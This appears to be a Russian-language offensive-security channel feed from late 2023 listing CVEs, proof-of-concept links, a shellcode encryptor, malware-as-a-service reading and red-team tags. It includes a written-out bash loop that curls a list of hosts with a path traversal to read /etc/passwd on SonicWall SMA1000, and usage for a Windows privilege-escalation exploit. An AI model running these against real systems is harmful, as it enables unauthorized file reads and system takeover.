CVE-2023-34040
Spring-Kafka-Deserialization RCE
POC

#apacheKafka

CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC:
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done

0-day для CVE-2023-4863 носится по интернету (chrome не при чем, дыра в libwebp image library).
И все бы ничего, но libwebp интегрирована во всё (ну почти)
Список покрытия

OffensiveCon 2023
Exploit Engineering – Attacking the Linux Kernel
76Слайдов

Что делать, если вас заставляют работать ?!

Интересное на почитать
*
When Exploits Arent Binary
*
Malware as a service (bunnyLoader)
*
#exploits #malware #read

CVE-2023-42793
Authentication Bypass in JetBrains TeamCity CI/CD

Спасибо всем кто поучаствовал. Отдельное спасибо юристу и правоведу

#ran #redteam #malware

Свежий выпуск Inception 7

Supernova
Real fucking shellcode encryptor (бгг)
download

#shellcode #enc

Следим за трендами

* exim RCE
* Linux glibc LPE
* curl RCE
* WS_FTPd
* admin/admin

Abusing Active Directory Certificate Services
Part One (5 october 2023)

#AD

From C, with inline assembly, to shellcode
read

#C #shell

VULN in CURL
get CVE-2023-38545 - поиграться (сегодня patch)

#curl

Update:
How I made a heap overflow in curl

#curl #libcurl #ssrf

CVE-2023-36802
windows Local Privilege Escalation
Usage:
Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>
где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEM
POC

#win #lpe

Ох твою мать а, не было печали...)))))))))))))))))
Короче, план такой
Надеюсь консультанты из Xpanamas ciscoTalos